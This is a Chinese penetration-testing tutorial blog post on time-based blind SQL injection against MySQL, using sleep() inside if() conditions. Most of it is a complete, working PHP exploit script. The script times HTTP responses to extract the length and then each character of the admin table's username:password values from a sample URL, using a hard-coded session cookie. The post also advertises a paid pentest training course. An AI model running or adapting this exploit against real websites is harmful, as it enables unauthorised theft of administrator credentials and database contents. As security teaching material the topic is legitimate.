[原创]WEB安全第七章 exp编写篇08 延时注入exp篇写
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第七章 exp编写篇08 延时注入exp篇写
1.简介
延时注入也是盲注入的一种,是利用sql语句达到延时的目的,在mysql中用的sleep()函数,
select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。
构造注入延时的语句,当开始到结束的时候肯定是五秒或者大于五秒
2.延时注入语句
php学习
[php]
<?php
$time1 = time();
sleep(10);
$time2 = time();
print $time2-$time1;
?>
[/php]
![[原创]WEB安全第七章 exp编写篇08 延时注入exp篇写](https://www.moonsec.com/wp-content/uploads/2019/11/image001-44.png)
![[原创]WEB安全第七章 exp编写篇08 延时注入exp篇写](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
mysql的延时语句
select if(‘root’=’root’,sleep(3),0)
数据的长度
select if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),0)
每一个字符的ascii码
select if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),0)
![[原创]WEB安全第七章 exp编写篇08 延时注入exp篇写](https://www.moonsec.com/wp-content/uploads/2019/11/image002-42.png)
延时注入的原理是什么?
就是利用mysql里面的sleep() 延时 就跟根据数据库的延时 判断网页的页面返回的时间。
假如条件判断正确 那么就会延时五秒,
3.编写exp
[php]
<?php
//参数1:访问的URL,参数2:post数据(不填则为GET),参数3:提交的$cookies,参数4:是否返回$cookies
function curl_request($url,$post=”,$cookie=”, $returnCookie=0){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, ‘Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)’);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
if($post) {
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
}
if($cookie) {
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
}
curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($curl);
if (curl_errno($curl)) {
return curl_error($curl);
}
curl_close($curl);
if($returnCookie){
list($header, $body) = explode("\r\n\r\n", $data, 2);
preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
$info[‘cookie’] = substr($matches[1][0], 1);
$info[‘content’] = $body;
return $info;
}else{
return $data;
}
}
//得到数据的长度
function getstrlen($url,$cookie){
$data_len =”;
$i = 1;
while(true){
$s = "%20and%20if(LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i},sleep(5),0)";
$start_time=time();
$urlexp = $url.$s;
$html = exploit($urlexp,$cookie);
if ((time()-$start_time)>=5){
$data_len=$i;
break;
}
$i++;
}
return $data_len;
}
function exploit($url,$cookie){
$html = curl_request($url,”,$cookie);
return $html;
}
//38
function get_data($url,$cookie,$datalen){
$admin_pass = ”;
for($i=1;$i<=$datalen;$i++){
for($j=1;$j<=125;$j++){
$s = "%20and%20if(ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j},sleep(5),0)";
$start_time=time();
$html = exploit($url.$s,$cookie);
if((time()-$start_time)>=5){
$c = chr($j);
$admin_pass.=$c;
echo $admin_pass."\r\n";
break;
}
}
}
return $admin_pass;
}
$cookie = ‘PHPSESSID=lkmi6apekkpfvemo5mnmf7opk7’;
$url = ‘http://www.moontester.com/article.php?id=1’;
//用来做比较用的
//$tmp_html = exploit($url,$cookie);
$datalen = getstrlen($url,$cookie);
if ($datalen){
echo "[+]".$datalen."[+]\r\n";
echo get_data($url,$cookie,$datalen);
}else{
echo "data null";
}
[/php]
填写登录的cookie 和注入的url 就会执行getstrlen函数就会用时间差得出长度为38 再把38传入到get_data函数里 用ascii进行每一个字符的ascii码的判断 再把判断好的ascii转为字符 累加起来 就会得出最后的结果
运行结果
![[原创]WEB安全第七章 exp编写篇08 延时注入exp篇写](https://www.moonsec.com/wp-content/uploads/2019/11/image003-34.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/567.html
mOon 